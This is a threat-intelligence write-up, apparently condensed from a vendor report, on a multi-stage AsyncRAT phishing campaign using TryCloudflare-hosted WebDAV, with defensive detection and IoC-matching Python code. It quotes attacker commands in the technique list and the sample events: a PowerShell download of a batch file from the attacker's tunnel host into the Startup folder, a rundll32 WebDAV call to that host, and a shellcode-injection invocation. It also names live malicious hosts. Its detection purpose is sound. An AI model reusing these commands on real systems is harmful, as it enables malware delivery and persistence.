Analyzing a Multi-Stage AsyncRAT Campaign via Managed Detection and Response

Threat actors abused Cloudflare’s free-tier TryCloudflare tunnels and legitimate Python environments to host WebDAV servers and deliver the AsyncRAT remote access trojan, using double-extension phishing lures and living-off-the-land techniques for persistence. The campaign installs an embedded Python runtime, executes ne.py to APC-inject shellcode from new.bin into explorer.exe, and persists via startup batch files while hiding behind trusted services to evade detection. #AsyncRAT #Cloudflare

Keypoints

  • Initial access via phishing: victims received Dropbox links to a double-extension Internet Shortcut (.pdf.url) that redirected to TryCloudflare-hosted WebDAV resources.
  • Threat actors hosted malicious scripts and payloads on Cloudflare free-tier TryCloudflare tunnels (e.g., plus-condos-thy-redeem.trycloudflare[.]com) to mask delivery under trusted infrastructure.
  • Infection chain: as.wsh → anc.wsf → vio.bat/xeno.bat, which download and install an embedded Python runtime and supporting scripts into a local folder (z1man) before executing ne.py and new.bin.
  • Persistence achieved via startup folder batch files (ahke.bat, olsm.bat) and living-off-the-land techniques using Windows Script Host, PowerShell, rundll32, svchost, and mounted WebDAV drives.
  • Payload and execution: new.bin (Donut-generated shellcode identified as AsyncRAT) is decrypted using a.txt and APC-injected into explorer.exe via the Python script ne.py.
  • Attackers used social engineering (opening a legitimate PDF) and legitimate distribution channels (official python.org download) to reduce suspicion and improve reliability of payload execution.

MITRE Techniques

  • [T1566] Phishing – Initial access via malicious email links and deceptive shortcut files (‘users received a phishing email containing a Dropbox link leading to an Internet Shortcut file (.url)’)
  • [T1105] Ingress Tool Transfer – Downloading scripts and binaries from remote WebDAV/HTTP locations hosted on TryCloudflare (‘downloads and executes additional malicious scripts hosted on a WebDAV server’)
  • [T1059.001] PowerShell – Used to download Python, fetch remote files, and extract archives (`powershell -Command "iwr 'https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip' -OutFile 'C:\Users\<user>\AppData\Local\Temp\p.zip'"`)
  • [T1059.003] Windows Script Host – Execution of .wsh/.wsf script files to drive the multi-stage infection (`"C:\WINDOWS\System32\WScript.exe" "plus-condos-thy-redeem.trycloudflare[.]com@SSL…"`)
  • [T1218] Signed Binary Proxy Execution – Using signed system binaries (rundll32.exe, svchost.exe) to interact with WebDAV and execute DLL functions (`rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie plus-condos-thy-redeem.trycloudflare[.]com@SSL`)
  • [T1547.001] Boot or Logon Autostart Execution: Startup Items – Persisting by placing batch files in the user Startup folder (`iwr 'https://plus-condos-thy-redeem.trycloudflare[.]com/ahke.bat' -OutFile 'C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ahke.bat'`)
  • [T1055.004] Process Injection: Asynchronous Procedure Call (APC) Injection – ne.py performs APC-style injection to run shellcode from new.bin inside explorer.exe (`python ne.py -i new.bin -k a.txt`, described in the report as Polymorphic APC Injection)
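The techniques above share one property: every stage is a signed Windows binary or a PowerShell one-liner, so a hash-based block would miss a rotated payload or tunnel name. The following is an added example (not code from the Trend Micro report) that encodes each stage of the chain as a behavioural rule over Sysmon-style process-creation events. The event dicts, the `alice` profile path and the `\DavWWWRoot\as.wsh` UNC tail are constructed sample input; the tunnel host, file names and command-line shapes come from the summary above.

```python
"""Behavioural detections for the AsyncRAT delivery chain summarised above.

Each rule keys on a living-off-the-land pattern the report describes rather
than on a hash, so it survives payload or tunnel-name rotation.  Events are
dict-shaped, Sysmon Event ID 1 style (Image, CommandLine, ParentImage);
adapt the field names to your EDR schema.
"""
import re

TUNNEL = "trycloudflare.com"


def _cl(ev: dict) -> str:
    return ev.get("CommandLine", "").lower()


def _img(ev: dict) -> str:
    return ev.get("Image", "").lower()


# Rule table: name -> predicate over a single event.
RULES = {
    # T1059.003: WScript/CScript launched with a script living on a WebDAV share
    "wsh_script_from_webdav": lambda ev:
        _img(ev).endswith(("\\wscript.exe", "\\cscript.exe"))
        and (TUNNEL in _cl(ev) or "@ssl" in _cl(ev) or "davwwwroot" in _cl(ev)),
    # T1218: rundll32 driving the WebDAV client (davclnt.dll) toward a tunnel host
    "davclnt_to_tunnel": lambda ev:
        _img(ev).endswith("\\rundll32.exe")
        and "davclnt.dll,davsetcookie" in _cl(ev) and TUNNEL in _cl(ev),
    # T1059.001: PowerShell pulling the embeddable Python zip into %TEMP%
    "ps_fetch_embedded_python": lambda ev:
        _img(ev).endswith(("\\powershell.exe", "\\pwsh.exe"))
        and re.search(r"\b(iwr|invoke-webrequest|curl|wget)\b", _cl(ev)) is not None
        and re.search(r"python-3\.\d+\.\d+-embed-amd64\.zip", _cl(ev)) is not None
        and "\\appdata\\local\\temp\\" in _cl(ev),
    # T1547.001: PowerShell writing a .bat into the user's Startup folder
    "ps_write_startup_batch": lambda ev:
        _img(ev).endswith(("\\powershell.exe", "\\pwsh.exe"))
        and "-outfile" in _cl(ev)
        and re.search(r"\\start menu\\programs\\startup\\.+?\.bat\b", _cl(ev)) is not None,
    # T1055.004 precursor: python.exe running from a user-writable folder with the
    # "-i <shellcode> -k <key>" argument shape the report quotes for ne.py
    "appdata_python_injector": lambda ev:
        _img(ev).endswith("\\python.exe") and "\\appdata\\local\\" in _img(ev)
        and re.search(r"\s-i\s+\S+\s+-k\s+\S+", _cl(ev)) is not None,
}


def _ps(cmd: str) -> str:
    """Wrap a command the way the report shows it: powershell -Command "<cmd>"."""
    return 'powershell -Command "' + cmd + '"'


# Constructed sample events (not taken from the report); the last one is a
# benign control that uses iwr for an ordinary download.
SAMPLE_EVENTS = [
    {"Image": r"C:\WINDOWS\System32\WScript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\WINDOWS\System32\WScript.exe" "\\plus-condos-thy-redeem.trycloudflare.com@SSL\DavWWWRoot\as.wsh"'},
    {"Image": r"C:\WINDOWS\system32\rundll32.exe",
     "ParentImage": r"C:\WINDOWS\system32\svchost.exe",
     "CommandLine": r"rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie plus-condos-thy-redeem.trycloudflare.com@SSL"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": _ps(r"iwr 'https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip' -OutFile 'C:\Users\alice\AppData\Local\Temp\p.zip'")},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": _ps(r"iwr 'https://plus-condos-thy-redeem.trycloudflare.com/ahke.bat' -OutFile 'C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ahke.bat'")},
    {"Image": r"C:\Users\alice\AppData\Local\z1man\python.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"python ne.py -i new.bin -k a.txt"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": _ps(r"iwr 'https://example.com/report.pdf' -OutFile 'C:\Users\alice\Downloads\report.pdf'")},
]


def evaluate(event: dict) -> list[str]:
    """Return the names of all rules the event matches."""
    return [name for name, pred in RULES.items() if pred(event)]


def scan(events) -> dict[int, list[str]]:
    """Map event index -> matched rules, omitting events that matched nothing."""
    hits = {}
    for i, ev in enumerate(events):
        matched = evaluate(ev)
        if matched:
            hits[i] = matched
    return hits


def chain_score(events) -> int:
    """Count distinct chain stages seen; several distinct stages on one host is a
    far stronger signal than any single rule, each of which can have benign hits."""
    return len({r for hits in scan(events).values() for r in hits})


if __name__ == "__main__":
    for i, matched in scan(SAMPLE_EVENTS).items():
        print(f"event {i}: {', '.join(matched)}")
    print("distinct stages seen:", chain_score(SAMPLE_EVENTS))
```

Correlating by host is the design choice that matters: a developer legitimately fetching the embeddable Python zip or a script run from a WebDAV share will trip a single rule, but the five stages together within a short window on one machine reproduce the chain the report describes and warrant an MDR escalation.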

Indicators of Compromise

  • [Domain] TryCloudflare tunnel domains used to host WebDAV and payloads – plus-condos-thy-redeem.trycloudflare[.]com, owners-insertion-rentals-pursuit.trycloudflare[.]com (and other trycloudflare[.]com tunnels)
  • [IP Address] Remote hosting and delivery servers – 87[.]106[.]191[.]217 (active server hosting components), 104[.]16[.]230[.]132 (Cloudflare edge seen in connections)
  • [File names] Malicious scripts and payloads observed in the chain – Rechnung zu Auftrag W19248960825.pdf.zip, Rechnung zu Auftrag W19248960825.pdf.url (initial lure), and other artifacts such as as.wsh, anc.wsf, vio.bat, xeno.bat, ne.py, new.bin, a.txt
  • [URLs] Download and delivery URLs used in the campaign – hxxps://dl[.]dropboxusercontent[.]com/…/Rechnung-zu-Auftrag-W19248960825.pdf.zip (phishing delivery), https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip (embedded Python download)
  • [File paths] Local installation and execution paths used on victims – C:\Users\<user>\AppData\Local\z1man\new.bin, C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ahke.bat (persistence)
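The indicators above are published defanged (`hxxps`, `[.]`), so they have to be refanged before they can be matched against DNS, proxy or connection logs, and the report's remark about "other trycloudflare[.]com tunnels" means the whole zone deserves a lower-confidence match rather than only the two named hosts. The example below is added here and is not the report's code; the log lines are constructed, the Cloudflare edge IP 104[.]16[.]230[.]132 is deliberately left out because it is shared infrastructure, and the `high`/`medium` labels are this example's own convention.

```python
"""Refang the report's defanged indicators and match them against log lines.

Hosts are compared as whole labels, so the zone match for trycloudflare.com
fires on '<anything>.trycloudflare.com' but not on 'nottrycloudflare.com'.
"""
import re
from urllib.parse import urlparse

# Indicators copied from the IoC list above, kept in their published form.
DEFANGED_IOCS = [
    "plus-condos-thy-redeem.trycloudflare[.]com",
    "owners-insertion-rentals-pursuit.trycloudflare[.]com",
    "87[.]106[.]191[.]217",
    "hxxps://plus-condos-thy-redeem.trycloudflare[.]com/ahke.bat",
]

# The report notes "other trycloudflare[.]com tunnels": match the whole zone,
# but as a lower-confidence hit because legitimate developers use it too.
TUNNEL_ZONE = "trycloudflare.com"


def refang(ioc: str) -> str:
    """Undo the common defanging conventions (hxxp, [.], (.), [:])."""
    s = ioc.strip().lower()
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s)
    return s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


def host_of(ioc: str) -> str:
    """Reduce a refanged IoC (URL, hostname or IP) to its host part."""
    if "://" in ioc:
        return urlparse(ioc).hostname or ""
    return ioc


EXACT_HOSTS = {host_of(refang(i)) for i in DEFANGED_IOCS}

# Anything that looks like a dotted hostname or IPv4 address inside a log line.
HOST_RE = re.compile(r"(?<![\w.-])((?:[a-z0-9-]+\.)+[a-z0-9-]+)(?![\w-])")

# Constructed log lines (DNS query, proxy access, connection); none are from
# the report.  The 10.0.0.x addresses are made-up internal clients.
SAMPLE_LOGS = [
    "dns 10.0.0.5 53 query=plus-condos-thy-redeem.trycloudflare.com rcode=NOERROR",
    "dns 10.0.0.5 53 query=updates.example.com rcode=NOERROR",
    "proxy 10.0.0.7 GET https://plus-condos-thy-redeem.trycloudflare.com/ahke.bat 200",
    "dns 10.0.0.9 53 query=random-words-here.trycloudflare.com rcode=NOERROR",
    "dns 10.0.0.9 53 query=nottrycloudflare.com rcode=NOERROR",
    "conn 10.0.0.5 -> 87.106.191.217:443 established",
]


def classify(line: str) -> list[tuple[str, str]]:
    """Return (confidence, host) pairs for every indicator found in the line."""
    hits = []
    for host in HOST_RE.findall(line.lower()):
        if host in EXACT_HOSTS:
            hits.append(("high", host))
        elif host == TUNNEL_ZONE or host.endswith("." + TUNNEL_ZONE):
            hits.append(("medium", host))
    return hits


def scan_logs(lines) -> list[tuple[int, str, str]]:
    """Flatten hits into (line index, confidence, host) tuples."""
    return [(i, conf, host)
            for i, line in enumerate(lines)
            for conf, host in classify(line)]


if __name__ == "__main__":
    for idx, conf, host in scan_logs(SAMPLE_LOGS):
        print(f"[{conf:6}] line {idx}: {host}")
```

A `medium` hit on an unlisted tunnel is where the behavioural rules earn their keep: on its own it is a developer exposing a local service, but combined with a WScript or rundll32 davclnt.dll launch against the same host it is the campaign's delivery stage under a fresh name.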


Read more: https://www.trendmicro.com/en_us/research/26/a/analyzing-a-a-multi-stage-asyncrat-campaign-via-mdr.html